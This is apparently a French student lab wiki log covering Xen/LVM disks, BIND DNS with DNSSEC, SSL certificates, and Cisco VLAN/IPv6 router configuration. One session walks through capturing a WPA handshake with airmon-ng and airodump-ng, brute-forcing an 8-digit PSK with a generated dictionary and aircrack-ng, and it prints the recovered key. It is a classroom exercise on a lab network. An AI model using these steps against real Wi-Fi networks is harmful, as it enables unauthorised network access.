Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
